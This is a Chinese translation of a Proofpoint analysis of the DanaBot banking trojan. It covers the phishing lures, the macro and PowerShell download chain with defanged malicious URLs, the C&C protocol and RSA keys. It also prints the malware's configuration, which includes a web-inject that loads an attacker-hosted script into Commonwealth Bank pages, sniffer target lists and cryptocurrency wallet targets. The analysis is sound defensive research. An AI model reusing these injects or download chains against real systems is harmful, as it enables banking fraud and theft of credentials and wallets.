针对DanaBot——新型银行木马病毒分析

luochicun Web安全 2018年6月10日发布

导语:2018年的黑客攻击方式已经发生了明显的转变,从过去直接实施大规模的、具有瞬间破坏性的勒索软件活动转变成了如今专注于利用银行木马。现在,一种新的银行木马——DanaBot已经出现,它直接扩大了电子邮件攻击的数量级,并增加了恶意邮件活

trojansydney.png

2018年的黑客攻击方式已经发生了明显的转变,从过去直接实施大规模的、具有瞬间破坏性的勒索软件活动转变成了如今专注于利用银行木马。在Proofpoint的研究人员目前观察到的电子邮件攻击样本中,银行木马占了将近60%的恶意载荷量。现在,一种新的银行木马——DanaBot已经出现,它直接扩大了电子邮件攻击的数量级,并增加了恶意邮件活动的多样性。

Proofpoint的研究人员发现了一种名为“DanaBot”的新型银行木马病毒,该木马通过包含恶意URL的电子邮件来对澳大利亚的用户发起攻击。DanaBot是用Delphi编写的恶意软件,目前它仍在实验开发阶段。迄今为止,研究人员只观察到一名黑客使用了它。但是,考虑到该黑客经常活跃于黑市,因此最后的传播和使用结果是否会变得广泛还有待观察。研究人员还在恶意软件库中发现了其他样本,而这些样本并不是研究人员在野外观察到的,这就意味着,有其他攻击者使用了DanaBot。

DanaBot的发现过程

研究人员首次在2018年5月6日将DanaBot定性为以澳大利亚为攻击目标的电子邮件攻击活动,并在其中发现了有效载荷。这些邮件使用了“核对收费帐单”的主题,如果用户点开了Word附件里的网址,那就会被重定向到其他网站上,比如hxxp://users[.]tpg[.]com[.]au/angelcorp2001/Account+Statement_Mon752018.doc。

1.png

来自2018年5月6日DanaBot活动的电子邮件样本

该Word文档包含一个宏,如果启用的话,它就可以使用来自hxxp://bbc[.]lumpens[.]org/tXBDQjBLvs.php的PowerShell命令来下载DanaBot。该有效载荷只能用于位于澳大利亚的潜在受害者,攻击时,后台服务器将检查客户的IP地理位置。另外,该文档还包含用于社会工程的手段,它在文档的首页会标明自己已经受到某某安全供应商的保护,下图中的品牌被模糊了。

2.png

“Account Statement_Mon752018.doc”文档的屏幕截图

DanaBot最近再次出现,则是在5月28日至30日之间,这次,它依然以澳大利亚为攻击目标,且电子邮件活动中还加了很多有效载荷。这些电子邮件使用了许多主题,例如:

· 证书“123456789”

· 文档“123456789”

· Document12345-678

· GT123456789

· 发票和跟踪代码12345678

· 来自John Doe的发票

这一次,电子邮件包含链接到FTP服务器上的压缩JavaScript的URL,包括ftp://kuku1770:GxRHRgbY7@ftp[.]netregistry[.]net/0987346-23764.zip。 JavaScript如果执行,则从 hxxp://members[.]giftera[.]org/whuBcaJpqg.php上下载DanaBot。当然,服务器在下载JavaScript之前,还是要检查了受害者的地理位置。

DanaBot的功能介绍

DanaBot是一个包含银行网站注入和窃取用户金融信息功能的木马,它包含一个下载器组件,该组件用于下载包含主DLL的加密文件。不过,DLL却使用的是原始TCP连接的方式,来连接到端口443并下载其他模块,包括:

· VNCDLL.dll – “VNC”

· StealerDLL.dll – “Stealer”

· ProxyDLL.dll – "Sniffer"

恶意软件还会下载配置文件,例如:

· 嗅探模块的目标站点列表

· 银行网站注入

· 要加密的货币流程和文件列表

最后,它还将文件上传到命令和控制(C&C)服务器,包括:

· 详细的系统信息

· 用户桌面的屏幕截图

· 用户硬盘上的文件列表

所有上传和下载都使用Microsoft CryptAPI AES256算法加密。

恶意软件分析

目前,恶意软件正在积极开发和测试阶段,目前似乎有两个版本。其中研究人员在5月6日和7日左右的活动中观察到是第一个版本,而第二个版本则在5月29日左右出现。然而,研究人员在对恶意软件库中的数据进行分析时,却发现了更早的样本,出现在4月中旬之前,不过研究人员还没有在野外看到这些样本的利用案例。

下载器组件

下载器组件与C&C服务器通信,并发送一个初始签入信标,其中包含有关URL参数中编码的关于受感染设备的报告,它发出如下所示的请求:

3.png

由旧版本的恶意软件生成的网络请求

4.png

新版恶意软件生成的网络请求,其中包含一组扩展的URL参数

在这些网络请求中,“e =”参数是用于使用Microsoft CryptAPI的CryptDeriveKey和CryptDecrypt使用MD5散列和AES算法来解密下一阶段有效载荷的密钥。下表中提供了其他参数的解释:

5.jpg

被感染的客户端向C&C发送的键-值对的说明

为了响应下载器的初始签入,C&C服务器会发送下一阶段的DLL。使用RSA算法和以下公钥对DLL进行加密验证:

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDOmbQ1gGQtE8PUhjKIETLaSSEc
JGp9O0gyckoyrIfb4l4BZqLKAkDGm59lUxSFWPCINQOMQvgvDYydMOyMvABtmi4c
0yb4te8dXE0xVxTQmnxGV9pAf3gfcEg3aqBne/7AQmS+0fFUpccX+huz4Sys415+
6lwVPX2A3RA60ToS6wIDAQAB

有效载荷DLL会使用“rundll32.exe”和参数“#1”来调用,随后,使用参数#2,#3等调用它。

主DLL组件

主DLL会使用原始TCP与端口443进行通信。研究人员观察到主DLL组件下载了更多DLL模块,例如VNC,Sniffer和Stealer以及配置文件,所有这些模块都使用Microsoft CryptAPI以类似方式加密。同样,使用不同于上面指出的公钥的RSA算法验证下载:

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCpQbDeOOrFbGOuu989TSd1+sJJ
gi1WFiYV0RInlLkAAv1XZwUodBJRMyNWeKPHg40dn9oseicUScBH3lQb5fRvwm9Q
oppN5DIhiK9au8yzhm6/BGDUuVfK+vDlutanjYLAnz/Wp/W9bofUe5Ej3WZo2w1T
X/KpjiO/gB/+4vf75wIDAQAB

6.jpg

主组件下载的模块

7.jpg

主组件下载的配置文件

研究人员还观察到DanaBot会将文件上传到C&C,每个文件都使用Deflate算法进行压缩,并使用随机AES密钥进行加密。而密钥本身似乎用一个RSA公钥加密并附加到上传的文件中。然而,解密将需要匹配的RSA私钥,这大概只对恶意软件操作员可用。

8.jpg

DanaBot的主组件上传的文件

以下RSA公钥专门用于系统信息上传,而其他文件的上传则使用与模块下载相同的密钥:

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCilEDyzfbBKas+W2brWstcdKfY
WgAl79oHSmdACo7zVCSkqJPocK3u3naHuFD3rYTTkEQbj6IaTNi1vn6eceNedExE
u3ppOvxzRKqCOUOB+yQbz9Hv8xzsh0QnlJzcuLZHDhCDWoKwMbNU2/AXiVR5w7wF
us8H3Gkr8MQZxt/bEwIDAQAB

在经过深入细致地分析后,第二次发现的DanaBot的下载模块则由一个头部,一个AES加密文件和一个RSA签名组成。例如,研究人员会重点介绍第二次发现的DanaBot中下载的VNC模块。

9.png

VNC模块中的hexdump

10.jpg

对下载的模块有效载荷的说明

配置文件

下面提供了一些DanaBot下载的配置文件的值:

*m.adnxs.com/ut/v3*
*.youtube.com*event=streamingstats*
*.youtube.com/api/stats/*
*outlook.live.com/owa/service.svc?action=LogDatapoint&*
*clientservices.googleapis.com*
*clients4.google.com*
*connect.facebook.net/log/*
*.mozilla.org*
*.mozilla.com*
*syndication.twitter.com/*
*cws.conviva.com*
*api.segment.io*
*as-sec.casalemedia.com*
*yunify.chicoryapp.com*
*oauth20_token.srf*
*Exchange/ucwa/oauth/v1/*
*beacons.gcp.gvt2.com*
*.facebook.com*
*.facebook.com/login.php?*
*mc.yandex.ru/webvisor*
*api.logmatic.io/v1/*
*sot3.mavenhut.com*
*erlang.simcase.ru/api/*
*sentry.io/api*
*dsn.algolia.net/1*
*t.urs.microsoft.com*
*.paypal.com/webapps/hermes/api/log*
*.netflix.com*
*s.update.fbsbx.com*
*.youtube.com/youtubei/v1/*
*p.cybertonica.com*
*webmail.subwayadmin.com.au*
*email.telstra.com/webmail/*
*.googleapis.com*
http://*
*outlook.office365.com/owa/service.svc?*
*outlook.office.com/owa/service.svc?*
*outlook.live.com/owa/service.svc?*
*mail.google.com/mail/u/0/*
*.client-channel.google.com*
*bam.nr-data.net*
*browser.pipe.aria.microsoft.com*
*client-s.gateway.messenger.live.com*
*notifications.google.com*
*.google.com/recaptcha/api2/*
*.bing.com*
*.youtube.com*
*bidder.criteo.com*
*.demdex.net/event?*
*insights.hotjar.com/api*
*nexus-long-poller-b.intercom.io*
*.icloud.com/*
*s.acexedge.com*
*s.update.*
*vid-io.springserve.com*
*vuws.westernsydney.edu.au*

嗅探器过滤器列表(旧版本为“PFUrlU”配置文件)以及新版本配置文件(“Pflilter”)在研究人员的测试中仅包含一个“* mozilla *”目标,表明这可能是白名单。

set_url *my.commbank.com.au/netbank* GP
data_before
data_end
data_inject
<script type=text/javascript language=JavaScript src=https:[//]dep.properfunds.org/print?vr=npm%3Fc3%28t%3F2[.]48758295816></script>
data_end
data_after
</html
data_end
data_before
</head>
data_end
data_inject
<div id=mjf230 style=left:0px;top:0px;width:100%;height:100%;background-color:White;position:absolute;z-index:91001;></div>
data_end
data_after
data_end
set_url *my.commbiz.commbank.com.au* GP
data_before
data_end
data_inject
<script type=text/javascript language=JavaScript src=https:[//]dep.properfunds.org/print?vr=npm%3Fc3%28t%3F2[.]487582958161></script>
data_end
data_after
</html
data_end
data_before
</head>
data_end
data_inject
<div id=mjf230 style=left:0px;top:0px;width:100%;height:100%;background-color:White;position:absolute;z-index:91001;></div>
data_end
data_after
data_end

Web注入配置文件(旧版本中为“InjFirst”,新版本中为“PInject”,添加到URL中的括号里)

*-QT*.EXE*
*ETHEREUM*.EXE*
*DECENT.EXE*
*ELECTRON*.EXE*
*ELECTRUM*.EXE*
*ZCASH*.EXE*
*EXPANSE*.EXE*
*SUMOCOIN*.EXE*
*BITCONNECT*.EXE*
*IOTA*.EXE*
*KARBOWANEC.EXE*
*ARKCLIENT.EXE*
*ZCLASSIC*WALLET.EXE*
*PASCALCOINWALLET.EXE*

加密电子货币流程(旧版本中为“BVideo”和“Bkey”配置文件,新版本中为“BitVideo”和“BitKey” 配置文件,将字体进行斜化处理的行为仅出现在旧版本中)

*\WALLETKEYS.DAT*
*\DEFAULT_WALLET*
*\WALLET.DAT*

CryptoCurrency文件(旧版本中为“CFiles”配置文件,新版本中为“BitFiles”;斜体文件仅出现在旧版本中)

Stealer模块

研究人员观察到,目前stealer模块的攻击目标仅仅是Windows Live Mail和Outlook等邮件客户端。另外,它还针对Miranda,Trillian和Digsby等即时通讯工具; FTP客户端,如WS_FTP,FileZilla和SmartFTP,并检查浏览器的历史记录。

15.png

针对浏览器信息的Stealer模块

16.png

针对FTP客户端的Stealer模块(实际列表要长得多)

总结

正如以上分析的那样,研究人员只观察到DanaBot被一名攻击者使用过,目前该样本已被Proofpoint定义为TA547。然而,这种趋势可能会改变,因为这位攻击者非常有名,在他的作用下,很可能会将DanaBot“发扬光大”。

自2017年11月起,TA547就和许多其他攻击有关联。这些攻击的目标经常是为澳大利亚、德国、英国和意大利等国。其中包括的恶意软件有ZLoader(又名Terdot),Gootkit,Ursnif,Corebot,Panda Banker,Atmos,Mazar Bot和Red Alert Android恶意软件。

值得注意的是,在公共恶意软件存储库中,除了发现于研究人员找到的DanaBot样本,它还包含其他的野外利用活动,该活动含有ID(“a =”参数),这表明研究人员还没有观察到所有的DanaBot活动。

最后,要特别提一下,DanaBot在其技术实现和技术选择方面与早期恶意软件有某些相似之处,特别是和Reveton勒索软件及CryptXXX关联很大,它们也是用Delphi编写的,并使用原始TCP到端口443进行通信。这些恶意软件还在C&C通信的风格方面具有相似之处。

经过近两年对勒索软件活动的追踪,研究人员发现,攻击者似乎越来越倾向于那些动静较小的恶意软件,如银行木马和信息窃取软件。DanaBot就是恶意软件的最新例子,其重点就在于窃取有用的信息,然后将这些信息进行买卖,而不是像原来那样要求受害者立即支付赎金。到目前为止,研究人员观察到的DanaBot活动中的社交工程的手段设计非常精密,这再次表明采用电子邮件攻击又被黑客重新重视了起来。DanaBot的模块化特性使其能够下载更多组件,从而增加了银行攻击的灵活性、强大的窃取能力以及远程监控能力。

另外,研究人员将继续深入研究这种新型恶意软件,并监控其攻击目标的变化。

IOCs

17.1.jpg

17.2.jpg

本文翻译自:https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0如若转载,请注明原文地址: http://www.4hou.com/web/11947.html
点赞 6
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论